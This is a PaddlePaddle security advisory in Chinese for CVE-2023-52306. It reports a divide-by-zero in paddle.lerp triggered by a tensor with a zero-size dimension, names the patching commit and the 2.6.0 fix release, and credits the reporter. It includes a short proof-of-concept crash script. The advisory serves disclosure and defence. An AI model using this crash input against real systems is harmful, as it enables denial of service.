CVE-2023-52306
不合法的张量shape可能导致paddle.lerp除0异常,PoC代码如下:
import paddle
import numpy as np
x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64))
y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 0, 0, 2, 6]).astype(np.float64))
weight = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64))
paddle.lerp(x, y, weight)我们在commit 19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。
请参考我们的安全指南以获得更多关于安全的信息,以及如何与我们联系问题。
此漏洞由 Tong Liu of CAS-IIE 提交。